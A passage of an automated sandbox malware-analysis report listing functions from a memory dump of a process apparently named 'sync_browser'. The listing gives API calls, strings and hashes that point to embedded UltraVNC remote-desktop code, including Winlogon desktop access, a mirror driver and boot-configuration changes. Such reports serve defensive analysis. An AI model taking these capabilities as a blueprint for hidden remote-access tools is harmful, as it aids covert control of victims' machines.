CreateFileW.KERNEL32 ref: 00007FF67E7D12E3
GetLastError.KERNEL32 ref: 00007FF67E7D12F2
WaitNamedPipeW.KERNEL32 ref: 00007FF67E7D130B
GetCurrentProcessId.KERNEL32 ref: 00007FF67E7D133B
WriteFile.KERNEL32 ref: 00007FF67E7D1567
Sleep.KERNEL32 ref: 00007FF67E7D1576
ReadFile.KERNEL32 ref: 00007FF67E7D1594
OpenProcess.KERNEL32 ref: 00007FF67E7D15A9
SetLastError.KERNEL32 ref: 00007FF67E7D15E4
Sleep.KERNEL32 ref: 00007FF67E7D1605
CloseHandle.KERNEL32 ref: 00007FF67E7D160E

Strings

WinStationQueryInformationW, xrefs: 00007FF67E7D124E
Winsta0\Winlogon, xrefs: 00007FF67E7D11CC, 00007FF67E7D1415
\\.\Pipe\TerminalServer\SystemExecSrvr\%d, xrefs: 00007FF67E7D12A4
\winsta.dll, xrefs: 00007FF67E7D1225

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMulusermedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
API String ID: 2145620463-2328478964
Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
Instruction ID: b0da2db8d607862fc02a191c4818547acea62e5f6a942aafa17ab3cead1eb9d0
Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
Instruction Fuzzy Hash: 16E1B227A2868289F720CF74D8442A9B3A5FF64798F504235FE5E87A94EF3CD549C700

Function 00007FF67E7E4D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2
GetSystemMetrics.USER32 ref: 00007FF67E7E4E33
GetSystemMetrics.USER32 ref: 00007FF67E7E4EBE
mouse_event.USER32 ref: 00007FF67E7E4FBA
GetSystemMetrics.USER32 ref: 00007FF67E7E4FE7
GetSystemMetrics.USER32 ref: 00007FF67E7E500B
GetSystemMetrics.USER32 ref: 00007FF67E7E5027
GetSystemMetrics.USER32 ref: 00007FF67E7E5046
GetCursorPos.USER32 ref: 00007FF67E7E50B1
SystemParametersInfoA.USER32 ref: 00007FF67E7E50D8
SystemParametersInfoA.USER32 ref: 00007FF67E7E50EA
SystemParametersInfoA.USER32 ref: 00007FF67E7E510E
SystemParametersInfoA.USER32 ref: 00007FF67E7E5122
mouse_event.USER32 ref: 00007FF67E7E5149
SystemParametersInfoA.USER32 ref: 00007FF67E7E5163
SystemParametersInfoA.USER32 ref: 00007FF67E7E5175

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 246551654-3977938048
Opcode ID: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
Instruction ID: 84f2b53325c1675bf6c92e15a445b833e81ad3b1262f7b665c5db61dd0829fb6
Opcode Fuzzy Hash: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
Instruction Fuzzy Hash: 7E22B033A18A918AF7648B35C4587FE37A5FBA5B48F044135EA4D8B6A5DF3CE948C700

Function 00007FF67E7D8590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7D85D3
GetProcAddress.KERNEL32 ref: 00007FF67E7D85EF
EnumDisplaySettingsA.USER32 ref: 00007FF67E7D862B
EnumDisplaySettingsA.USER32 ref: 00007FF67E7D86BD
FreeLibrary.KERNEL32 ref: 00007FF67E7D874B
GetCurrentThreadId.KERNEL32 ref: 00007FF67E7D88B9
GetThreadDesktop.USER32 ref: 00007FF67E7D88C1
OpenInputDesktop.USER32 ref: 00007FF67E7D88D9
SetThreadDesktop.USER32 ref: 00007FF67E7D88EA
ChangeDisplaySettingsExA.USER32 ref: 00007FF67E7D890C
ChangeDisplaySettingsExA.USER32 ref: 00007FF67E7D8929
SetThreadDesktop.USER32 ref: 00007FF67E7D8939
CloseDesktop.USER32 ref: 00007FF67E7D8947
FreeLibrary.KERNEL32 ref: 00007FF67E7D8950
FreeLibrary.KERNEL32 ref: 00007FF67E7D8968

Strings

mv2, xrefs: 00007FF67E7D8836
mv video hook driver2, xrefs: 00007FF67E7D8724
EnumDisplayDevicesA, xrefs: 00007FF67E7D85E5
USER32, xrefs: 00007FF67E7D85BC
DEVICE0, xrefs: 00007FF67E7D87C8
\DEVICE, xrefs: 00007FF67E7D879A
, xrefs: 00007FF67E7D8846

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
API String ID: 1729393483-4131161223
Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction ID: 0932ff7649af65b1c8ba03a63dbb9bbe80573297fece72e4fbf66769b7d7d73b
Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
Instruction Fuzzy Hash: C0B1A037F2968286FB60CF69E8402B967A4FB64764F684135EA4D9B684DF3CE509C700

Function 00007FF67E7D9740 Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 246libraryloaderCOMMON

Download Yara Rule

APIs

EnumDisplaySettingsA.USER32 ref: 00007FF67E7D97A1
LoadLibraryA.KERNEL32 ref: 00007FF67E7D97B6
GetProcAddress.KERNEL32 ref: 00007FF67E7D97D2
FreeLibrary.KERNEL32 ref: 00007FF67E7D9856
FreeLibrary.KERNEL32 ref: 00007FF67E7D9891
CreateDCA.GDI32 ref: 00007FF67E7D99F6
DeleteDC.GDI32 ref: 00007FF67E7D9A04

Strings

Driver version OK , xrefs: 00007FF67E7D98EE
mv video hook driver2, xrefs: 00007FF67E7D9814
Driver not found: Perhaps you need to reboot after install, xrefs: 00007FF67E7D9844
DISPLAY, xrefs: 00007FF67E7D99C7
Driver Not Activated, is the viewer current connected ?, xrefs: 00007FF67E7D9A90
EnumDisplayDevicesA, xrefs: 00007FF67E7D97C8
USER32, xrefs: 00007FF67E7D97A7
driver Active, xrefs: 00007FF67E7D99BC
access denied, permission problem, xrefs: 00007FF67E7D9A4D
Driver verion is not 1.00.22 , xrefs: 00007FF67E7D991F
1.00.22, xrefs: 00007FF67E7D98CF
mv2.dll, xrefs: 00007FF67E7D98AE
access ok, xrefs: 00007FF67E7D9A19
driver info: required version 1.00.22, xrefs: 00007FF67E7D983D
Is winvnc started with run as admin, no permission to start mirror driver? , xrefs: 00007FF67E7D9B03

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
API String ID: 524771730-2664985301
Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
Instruction ID: 8fcb34daab27fe8da2bb2068795a676b02df7ec200800289c163c708f4cd28a5
Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
Instruction Fuzzy Hash: 1AD16137A69B82D5E760CB25E8442A977B0FB18360F444236EA6D977E0DF3CE529C710

Function 00007FF67E7D7B90 Relevance: 38.7, APIs: 14, Strings: 8, Instructions: 227fileCOMMON

Download Yara Rule

APIs

InitializeSecurityDescriptor.ADVAPI32 ref: 00007FF67E7D7BFC
SetSecurityDescriptorDacl.ADVAPI32 ref: 00007FF67E7D7C14
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32 ref: 00007FF67E7D7C2E
GetLastError.KERNEL32 ref: 00007FF67E7D7C36
GetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF67E7D7C63
SetSecurityDescriptorSacl.ADVAPI32 ref: 00007FF67E7D7C82
CreateFileMappingA.KERNEL32 ref: 00007FF67E7D7E52
MapViewOfFile.KERNEL32 ref: 00007FF67E7D7E82
CreateEventA.KERNEL32 ref: 00007FF67E7D7EA4
CreateEventA.KERNEL32 ref: 00007FF67E7D7EC2
CreateFileMappingA.KERNEL32 ref: 00007FF67E7D7EF6
MapViewOfFile.KERNEL32 ref: 00007FF67E7D7F23
CreateEventA.KERNEL32 ref: 00007FF67E7D7F49
CreateEventA.KERNEL32 ref: 00007FF67E7D7F6B

Strings

Global\, xrefs: 00007FF67E7D7CA1, 00007FF67E7D7CBC, 00007FF67E7D7CD0, 00007FF67E7D7CEF, 00007FF67E7D7D03, 00007FF67E7D7D22
event_IN_DONE, xrefs: 00007FF67E7D7DC2
event_IN, xrefs: 00007FF67E7D7D98
event_OUT, xrefs: 00007FF67E7D7DEC
fm_IN, xrefs: 00007FF67E7D7D48
event_OUT_DONE, xrefs: 00007FF67E7D7E16
S:(ML;;NW;;;LW), xrefs: 00007FF67E7D7C24
fm_OUT, xrefs: 00007FF67E7D7D6E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
API String ID: 1989023930-362996323
Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction ID: dad0b330134f589517a3a62b90e5effda80895b8dad08fb78565e796dc8cc26f
Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
Instruction Fuzzy Hash: 66B1A923B28B8296EA54DBA0E4557EAA360FB99354F844131FB1D57B94DF3CE52EC300

Function 00007FF67E7D2E40 Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32 ref: 00007FF67E7D2E5D
OpenServiceA.ADVAPI32 ref: 00007FF67E7D2EAD
GetLastError.KERNEL32 ref: 00007FF67E7D2EBB
CloseServiceHandle.ADVAPI32 ref: 00007FF67E7D2EE0

Part of subcall function 00007FF67E7CA040: OpenInputDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA07A
Part of subcall function 00007FF67E7CA040: GetCurrentThreadId.KERNEL32 ref: 00007FF67E7CA083
Part of subcall function 00007FF67E7CA040: GetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA08B
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0A6
Part of subcall function 00007FF67E7CA040: MessageBoxA.USER32 ref: 00007FF67E7CA0B7
Part of subcall function 00007FF67E7CA040: SetThreadDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0C2
Part of subcall function 00007FF67E7CA040: CloseDesktop.USER32(?,?,?,00007FF67E7C82D7), ref: 00007FF67E7CA0CB

Strings

Failed to open service control manager, xrefs: 00007FF67E7D2E76
UltraVNC, xrefs: 00007FF67E7D2E6F, 00007FF67E7D2ECA, 00007FF67E7D2EF9, 00007FF67E7D2F81
Failed to query service status, xrefs: 00007FF67E7D2F37
Failed to open the service, xrefs: 00007FF67E7D2F00
Failed to delete the service, xrefs: 00007FF67E7D2F7A
Failed: Permission denied, xrefs: 00007FF67E7D2ED1
uvnc_service, xrefs: 00007FF67E7D2E98

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
API String ID: 1921882253-4018834470
Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction ID: 751dbf50686184286289ab488db6c557b771d1c259d905c1dfb057ddb1b7b494
Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
Instruction Fuzzy Hash: 62415327F2CA4382FA14DB15E8542B8A365FF69B84F540435F90EC62A4EF2DE58ED700

Function 00007FF67E7CA910 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 122COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF67E7CA93D
GetLastError.KERNEL32 ref: 00007FF67E7CA947
SystemParametersInfoA.USER32 ref: 00007FF67E7CA9AB
GetLastError.KERNEL32 ref: 00007FF67E7CA9B5
SystemParametersInfoA.USER32 ref: 00007FF67E7CAA16
GetLastError.KERNEL32 ref: 00007FF67E7CAA20
SystemParametersInfoA.USER32 ref: 00007FF67E7CAAB1
GetLastError.KERNEL32 ref: 00007FF67E7CAABB
SystemParametersInfoA.USER32 ref: 00007FF67E7CAB0D
GetLastError.KERNEL32 ref: 00007FF67E7CAB17

Strings

HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF67E7CA9E6
HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF67E7CA9BB
HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CAB3F
HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAA4D
HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAA26
HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAAE1
HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAAC1
HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CA94D
HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CA97B
HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CAB1D

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
API String ID: 2777246624-1480653996
Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
Instruction ID: 4dcdbf66247a0d7bc32b354e643889aadbe2b2e99c376903f0aca57837a90b7d
Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
Instruction Fuzzy Hash: 6F517967F2C98385FB50DB68E8547B9A6A9AF75308F404632F80ED35B1EE2CA44DC341

Function 00007FF67E7D37E0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 127COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF67E7D3813
GetEnvironmentVariableA.KERNEL32 ref: 00007FF67E7D3835
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7D3887
GetPrivateProfileStringA.KERNEL32 ref: 00007FF67E7D38CF
WritePrivateProfileStringA.KERNEL32 ref: 00007FF67E7D3921
SetFileAttributesA.KERNEL32 ref: 00007FF67E7D3930
GetEnvironmentVariableA.KERNEL32 ref: 00007FF67E7D394E
GetForegroundWindow.USER32 ref: 00007FF67E7D39F5
ShellExecuteExA.SHELL32 ref: 00007FF67E7D3A2F

Strings

boot loader, xrefs: 00007FF67E7D386B
runas, xrefs: 00007FF67E7D3A03
/boot.ini, xrefs: 00007FF67E7D3852
\system32\, xrefs: 00007FF67E7D3991
eboot, xrefs: 00007FF67E7D39DB
bcdedit.exe, xrefs: 00007FF67E7D39C7
SystemRoot, xrefs: 00007FF67E7D393F
default, xrefs: 00007FF67E7D3859
SYSTEMDRIVE, xrefs: 00007FF67E7D382E
operating systems, xrefs: 00007FF67E7D38C0, 00007FF67E7D3917

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfileString$EnvironmentVariable$AttributesExecuteFileForegroundShellVersionWindowWrite
String ID: /boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$eboot$operating systems$runas
API String ID: 3443580464-3826360582
Opcode ID: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
Instruction ID: 479f700f91f188c12dd9dcf4ef04d12a9cc1f26a62a17ff6f06611dfefc84234
Opcode Fuzzy Hash: 8f405f99423453285309b5ba9db0ae769014fde6afb609773d47d48ac683e545
Instruction Fuzzy Hash: DC613236A25B8699E710CF64E8442E973A0FB58358F401336FA6D87AD9DF7CD219C740

Function 00007FF67E7C7B37 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF67E7C7C5B

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

sprintf.LIBCMT ref: 00007FF67E7C7CC6
sprintf.LIBCMT ref: 00007FF67E7C7D04
sprintf.LIBCMT ref: 00007FF67E7C7D68
GetUserNameA.ADVAPI32 ref: 00007FF67E7C7E9C

Strings

ComputerName : , xrefs: 00007FF67E7C7F2C
